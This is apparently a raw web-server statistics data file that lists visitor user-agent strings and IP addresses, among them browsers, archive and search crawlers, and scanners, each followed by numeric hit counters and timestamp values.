29320961 0 29361379 29320961 0 28974060 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28974060 0 0 28974060 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/119.0 4 1 0 0 0 28598795 0 0 28598795 0 0 2321 Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.8) Gecko/2009032711 4 1 1 0 0 29389153 0 0 29389153 0 0 623 Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA666464) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1311.98 Mobile Safari/537.3 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 4 0 0 0 1 0 0 29320578 0 0 29320578 0 Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_1 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.0 EdgiOS/137.0.3296.37 Mobile/15E148 Safari/537.36 4 1 0 0 0 28795203 0 0 28795203 0 0 362 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.172 Safari/537.36 Vivaldi/2.5.1525.48 4 1 1 0 0 28601201 0 0 28601201 0 0 612 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 4 5 2 0 0 29076220 0 0 29032968 0 0 3805 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0 4 1 0 0 0 29271246 0 0 29271246 0 0 362 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36 4 4 4 0 1 29135431 0 29135431 29135431 0 29135431 4148 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 1 0 0 0 28598795 0 0 28598795 0 0 362 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 4 1 1 0 0 28862145 0 0 28862145 0 0 512 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/76f39f7 warc/v0.8.53 4 0 0 0 2 0 0 29368849 0 0 29361308 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.5.8 Chrome/120.0.6099.283 Electron/28.2.3 Safari/537.36 4 18 6 0 0 29301500 0 0 28600010 0 0 18296 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 4 12 12 0 68 29393906 0 29393907 29320577 0 29320577 11928 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 4 1 1 0 0 28760125 0 0 28760125 0 0 612 Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre 4 1 1 0 0 28606744 0 0 28606744 0 0 612 BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 4 30 30 1 2 29244615 29180151 29180151 28788879 29180151 28788975 16818 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 4 1 0 0 0 28784461 0 0 28784461 0 0 2321 Mozilla/5.0 (Linux; Android 9; GM1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 1 0 0 28745083 0 0 28745083 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 4 1 1 0 0 29186749 0 0 29186749 0 0 609 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 4 5 1 0 0 28619043 0 0 28619043 0 0 4981 Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 4 2 1 0 0 28774999 0 0 28598795 0 0 974 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.7) Gecko/2009021910 MEGAUPLOAD 1.0 4 4 1 0 0 28951504 0 0 28951504 0 0 4479 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/126.0.2592.81 Safari/537.36 HeadlessEdg/126.0.2592.81 4 1 1 0 0 28701918 0 0 28701918 0 0 612 Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 4 1 0 0 0 28784071 0 0 28784071 0 0 362 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 4 0 0 0 6 0 0 29176024 0 0 29176024 0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 4 0 0 0 1 0 0 29128604 0 0 29128604 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 4 0 0 0 1 0 0 29368850 0 0 29368850 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 6 6 0 6 29245043 0 29239575 29164554 0 29164554 3554 Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0 4 1 0 0 0 28784073 0 0 28784073 0 0 362 Mozilla/5.0 (Linux; Android 9; LG-H930) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 9; Redmi 4 Prime) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 4 1 0 0 3 29319621 0 29373626 29319621 0 29373626 2321 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 2 0 0 0 28774999 0 0 28774464 0 0 4642 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 4 0 0 0 1 0 0 29128604 0 0 29128604 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2317.2792.3373/49 4 7 7 0 81 29127160 0 29228316 28995765 0 28995765 3575 Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 4 1 0 0 0 28760125 0 0 28760125 0 0 2321 Mozilla/5.0 (Linux; U; Android 9; zh-cn; PCCM00 Build/PKQ1.190223.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 OppoBrowser/20.6.0.0.2beta 4 1 1 0 0 29389518 0 0 29389518 0 0 314 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/136.0.0.0 Safari/537.36 4 17 17 0 0 29335301 0 0 28621086 0 0 20418 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) 4 0 0 0 12 0 0 29301184 0 0 28598316 0 Mozilla/5.0 (l9scan/2.0.5313e2731323e27383e2439313; +https://leakix.net) 4 4 1 0 1 29099992 0 29099992 29099992 0 29099992 4476 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29106653 0 0 29106653 0 python-requests/2.25.1 4 0 0 0 1 0 0 28782949 0 0 28782949 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20 4 1 0 0 0 28606744 0 0 28606744 0 0 2321 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 4 1 1 0 0 28780398 0 0 28780398 0 0 612 Mozilla/5.0 (Linux; Android 9; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 1 0 0 28730287 0 0 28730287 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 4 0 0 0 1 0 0 28660294 0 0 28660294 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 4 0 0 0 2 0 0 29364468 0 0 29362288 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36 4 1 1 0 0 29384542 0 0 29384542 0 0 314 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 1 1 0 0 29182271 0 0 29182271 0 0 609 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.6.5 Chrome/124.0.6367.243 Electron/30.1.2 Safari/537.36 4 0 0 0 5 0 0 29365390 0 0 29365390 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 4 6 6 0 6 28860141 0 28860141 28640178 0 28640178 3549 Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9) 4 2 2 0 1 28776600 0 28776600 28598479 0 28776600 1224 Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 4 1 0 0 0 28703414 0 0 28703414 0 0 2321 LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 4 2 0 0 0 29326536 0 0 29326536 0 0 2683 python-requests/2.32.5 4 0 0 0 1 0 0 28702018 0 0 28702018 0 Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 4 0 0 0 1 0 0 29364458 0 0 29364458 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 1 0 0 0 28703414 0 0 28703414 0 0 362 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) 4 0 0 0 2 0 0 29288639 0 0 29250062 0 python-requests/2.32.4 4 4 4 0 0 28954917 0 0 28777010 0 0 2148 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 4 0 0 0 3 0 0 29092191 0 0 29088704 0 python-requests/2.32.3 4 5 1 0 0 29301184 0 0 29301184 0 0 5055 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36 Edg/103.0.1264.44 4 37 37 0 0 29265860 0 0 28600376 0 0 22593 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29358155 0 0 29358155 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15 4 1 0 0 0 28795203 0 0 28795203 0 0 2321 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 4 2 2 0 0 29415662 0 0 29392800 0 0 628 cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29277099 0 0 29277099 0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 YaBrowser/20.12.3.138 Yowser/2.5 Safari/537.36 4 1 0 0 0 28606744 0 0 28606744 0 0 362 Mozilla/5.0 (Linux; Android 4.4.2; LG-V410 Build/KOT49I.V41010d) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.103 Safari/537.36 4 1 1 0 3 28686848 0 28774705 28686848 0 28686848 612 Mozilla/5.0 (Linux; Android 11; M2004J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 4 1 1 0 0 28690191 0 0 28690191 0 0 612 Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1 4 1 0 0 0 28599414 0 0 28599414 0 0 362 Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b) Gecko/20050217 4 1 1 0 0 29320578 0 0 29320578 0 0 682 Mozilla/5.0 (Linux; Android 15; PEGM10; Build/AP3A.230720.159) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.50 Mobile Safari/537.36 4 1 1 0 0 29001935 0 0 29001935 0 0 512 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/08548af warc/v0.8.70 4 0 0 0 2 0 0 29405740 0 0 29405245 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot 4 14 6 0 174 29265337 0 29348987 28979553 0 29032976 14192 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 4 3 3 0 0 28999276 0 0 28598316 0 0 1733 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 4 0 0 0 8 0 0 29361369 0 0 29361369 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 4 2 2 0 10 29285613 0 29285613 28968419 0 28696768 1118 Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 4 0 0 0 37 0 0 29187279 0 0 29187198 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 4 1 0 0 0 28784072 0 0 28784072 0 0 362 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 4 2 2 0 63 29325243 0 29325243 29325243 0 29325243 1364 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.9 (KHTML, like Gecko) Version/5.1.4 Safari/535.8 4 1 0 0 0 28687825 0 0 28687825 0 0 362 Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 4 1 0 0 0 28780399 0 0 28780399 0 0 362 Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42 4 0 0 0 2 0 0 28686123 0 0 28604394 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 4 1 1 0 0 29371365 0 0 29371365 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29406080 0 0 29406080 0 Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 4 32 32 0 52 29097720 0 29097720 28902621 0 28902621 16354 Mozilla/5.0 (compatible) 4 2 0 0 0 29041404 0 0 28776330 0 0 4642 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 4 0 0 0 5 0 0 29358942 0 0 29358942 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 YaBrowser/25.8.0.0 Safari/537.36 4 16 16 0 69 29211399 0 29211399 28691360 0 28691360 9774 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 4 0 0 0 1 0 0 29250567 0 0 29250567 0 Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/115.0 Safari/537.36 4 3 3 0 3 29038499 0 29038507 28950811 0 28950818 3111 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 4 0 0 0 16 0 0 29140866 0 0 28950079 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 4 1 0 0 0 28784074 0 0 28784074 0 0 362 Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 4 1 1 0 0 29277099 0 0 29277099 0 0 609 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45 4 1 1 0 0 28687204 0 0 28687204 0 0 612 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko Fedora/1.9.0.2-1.fc9 4 1 1 0 0 28776330 0 0 28776330 0 0 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 4 1 0 0 0 28784073 0 0 28784073 0 0 2321 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 4 4 4 0 0 28686892 0 0 28598495 0 0 2448 Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36 4 1 1 0 0 29314499 0 0 29314499 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 4 4 0 19 29362874 0 29313368 29120842 0 28886193 3924 Mozilla/5.0 4 0 0 0 1 0 0 29361307 0 0 29361307 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 4 1 0 0 0 28780398 0 0 28780398 0 0 362 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 4 0 0 0 1 0 0 29368849 0 0 29368849 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 4 2 0 0 0 28784460 0 0 28687825 0 0 2683 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 4 0 0 0 1 0 0 28706013 0 0 28706013 0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 YaBrowser/19.3.1.828 Yowser/2.5 Safari/537.36 4 0 0 0 4 0 0 29294911 0 0 28950266 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 4 0 0 0 1 0 0 28693290 0 0 28693290 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140 [ip:79.244.164.230] 4 1 0 0 0 28701918 0 0 28701918 0 0 362 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 4 0 0 0 1 0 0 28962546 0 0 28962546 0 Mozilla/5.0 (Linux; Android 9; CPH1859) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 4 0 0 0 1 0 0 28696724 0 0 28696724 0 Mozilla/5.0 (Linux; Android 7.0; EVA-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 1 0 0 28974060 0 0 28974060 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 4 1 1 0 0 29343610 0 0 29343610 0 0 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 4 4 4 0 0 29028196 0 0 28939495 0 0 2048 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 4 3 1 0 0 29302432 0 0 29302432 0 0 9753 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 4 1 0 0 0 28983272 0 0 28983272 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 4 1 0 0 0 28784070 0 0 28784070 0 0 362 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1 4 13 13 0 0 29211398 0 0 28691360 0 0 16386 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 4 16 8 0 8 28951164 0 28951164 28861809 0 28861809 69936 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 4 0 0 0 1 0 0 29088736 0 0 29088736 0 python-requests/2.31.0 4 1 1 0 1 28598479 0 28598479 28598479 0 28598479 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36 4 22 6 0 10 29359012 0 29359012 29254547 0 29354717 22526 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 4 0 0 29352522 0 0 29231833 0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot) 4 2 2 0 10 29274239 0 29274239 29270173 0 29270173 2514 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 0 0 0 3 0 0 29369155 0 0 29369155 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36 4 1 1 0 3 29366951 0 29373623 29366951 0 29373623 1365 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 4 0 0 0 3 0 0 29364327 0 0 29364327 0 Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 4 1 0 0 0 28784071 0 0 28784071 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 4 1 1 0 0 29363349 0 0 29363349 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 4 1 0 0 0 28950910 0 0 28950910 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0 4 0 0 0 2 0 0 29301185 0 0 29301184 0 Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 4 1 0 0 0 28599414 0 0 28599414 0 0 2321 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 4 0 0 0 4 0 0 29361766 0 0 29355662 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/89.0.4389.105 Safari/537.36 4 0 0 0 1 0 0 29357731 0 0 29357731 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 12 12 0 12 29399356 0 29399356 29258587 0 29258587 6566 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 30 6 0 0 29176024 0 0 29176024 0 0 29896 Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36 4 1 0 0 0 28950912 0 0 28950912 0 0 362 Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 5 0 0 0 1 0 0 29172778 0 0 29172778 0 203.89.120.4 5 2 2 0 2 28744417 0 28744417 28744417 0 28744417 1224 147.182.210.190 5 0 0 0 1 0 0 28782949 0 0 28782949 0 195.178.110.21 5 0 0 0 1 0 0 29038507 0 0 29038507 0 91.196.152.81 5 1 1 0 1 28860141 0 28860141 28860141 0 28860141 509 35.95.85.214 5 1 1 0 0 28862145 0 0 28862145 0 0 512 207.241.235.133 5 0 0 0 1 0 0 29190598 0 0 29190598 0 171.15.23.228 5 1 1 0 0 29367829 0 0 29367829 0 0 682 54.205.94.64 5 6 6 0 5 29389153 0 29389153 28598316 0 28598316 3274 51.89.167.1 5 1 1 0 1 29401064 0 29312102 29401064 0 29312102 623 195.178.110.155 5 1 1 0 1 28739356 0 28739356 28739356 0 28739356 608 18.246.6.54 5 1 1 0 1 29225598 0 29225598 29225598 0 29225598 609 68.183.192.130 5 1 1 0 1 28640178 0 28640178 28640178 0 28640178 608 18.246.6.51 5 0 0 0 1 0 0 29353653 0 0 29353653 0 95.182.77.163 5 0 0 0 1 0 0 29303342 0 0 29303342 0 13.221.75.227 5 0 0 0 3 0 0 28730748 0 0 28697877 0 45.148.10.142 5 2 2 0 0 28689738 0 0 28689738 0 0 1224 178.62.210.19 5 1 1 0 0 29389822 0 0 29389822 0 0 314 34.79.231.32 5 1 0 0 0 29213346 0 0 29213346 0 0 87 52.77.243.142 5 0 0 0 1 0 0 29157451 0 0 29157451 0 35.181.169.38 5 0 0 0 1 0 0 28780027 0 0 28780027 0 54.83.229.91 5 7 3 0 2 28598479 0 28598479 28598479 0 28598479 5798 34.248.137.227 5 1 0 0 0 29389153 0 0 29389153 0 0 106 18.217.87.215 5 1 0 0 0 29037485 0 0 29037485 0 0 87 13.60.186.107 5 0 0 0 1 0 0 29218616 0 0 29218616 0 91.196.152.49 5 2 2 0 2 28741567 0 28741567 28741567 0 28741567 1216 64.226.127.225 5 0 0 0 1 0 0 29348354 0 0 29348354 0 62.248.119.244 5 0 0 0 3 0 0 29373623 0 0 29373623 0 